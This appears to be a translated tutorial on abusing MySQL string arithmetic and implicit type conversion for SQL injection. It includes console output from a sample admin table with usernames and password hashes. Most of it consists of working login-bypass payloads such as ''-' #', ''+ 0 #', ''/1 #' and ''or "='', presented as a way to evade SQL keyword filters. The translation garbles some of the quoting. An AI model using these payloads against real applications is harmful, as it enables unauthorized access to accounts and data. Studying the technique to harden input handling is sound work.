Use MySQL string operations to implement sophisticated SQL injection attacks

Ref: [Abusing MySQL string arithmetic for tiny SQL Injections]

Let's look at this scenario first.
The table structure is as follows:

mysql> desc admin;+----------+--------------+------+-----+---------+----------------+| Field    | Type         | Null | Key | Default | Extra          |+----------+--------------+------+-----+---------+----------------+| id       | mediumint(9) | NO   | PRI | NULL    | auto_increment || name     | char(32)     | NO   | UNI | NULL    |                || password | char(32)     | NO   | UNI | NULL    |                |+----------+--------------+------+-----+---------+----------------+3 rows in set (0.00 sec)

Run select * from admin; to return all records.

+----+--------+----------------------------------+| id | name   | password                         |+----+--------+----------------------------------+|  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 ||  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 ||  4 | n00b   | ff80e8508d39047460921792273533a4 |+----+--------+----------------------------------+3 rows in set (0.00 sec)

Execute select * from admin where name = ";, no matching records.

mysql> select * from admin where name = '';Empty set (0.00 sec)

Then we will execute select * from admin where name = "-";

+----+--------+----------------------------------+| id | name   | password                         |+----+--------+----------------------------------+|  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 ||  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 ||  4 | n00b   | ff80e8508d39047460921792273533a4 |+----+--------+----------------------------------+3 rows in set, 3 warnings (0.00 sec)

We can see that all records are successfully returned, but there are three warnings. Let's take a look at the warning information:

mysql> show warnings;+---------+------+------------------------------------------| Level   | Code | Message+---------+------+------------------------------------------| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin| Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s| Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b+---------+------+------------------------------------------3 rows in set (0.00 sec) www.2cto.com

It indicates that the DOUBLE value 'admin' is truncated. This type of warning is generated when numeric values are used in a string column.
Select "-" is executed separately.

mysql> select ''-'';+-------+| ''-'' |+-------+|     0 |+-------+1 row in set (0.00 sec)

0 is returned, that is, the name sub-segment of each row we query will be compared with 0. This will trigger a type conversion, and the Conversion Result of the name field must be 0:

mysql> select CAST((select name from admin limit 1,1) as DECIMAL);+-----------------------------------------------------+| CAST((select name from admin limit 1,1) as DECIMAL) |+-----------------------------------------------------+|                                                   0 |+-----------------------------------------------------+1 row in set, 1 warning (0.00 sec)

Therefore, the where statement constitutes an equal condition, where 0 = "-", and the record is returned.

SQL Injection scenario:Http://www.sqlzoo.net/hack/

If we want to bypass login verification, we have provided a traditional tips: the username and password are both 'or "='
Such logic and bypass methods are very common and will not be explained here.

This discovery technique allows you to use a very sophisticated method and avoid using SQL keywords to bypass logon.

Enter '-' # In the name sub-segment and leave the password blank to bypass logon verification.

Except "-", other operators "+", "*", and "^" have the same effect. Continue the test. We found that we only need to construct the condition where the query result is 0 when the single quotation marks are closed.

mysql> select ''/1;+------+| ''/1 |+------+|    0 |+------+1 row in set (0.00 sec)

Similar to "+ 0,"-0, "* 0," ^ 0.
In the injection environment we just used the following simple payload to bypass login authentication:
'+ 0 #,'/1 #, '^ 0,'-0 #, and so on.
With this feature, you can use this method to filter the SQL keywords in the injection statement.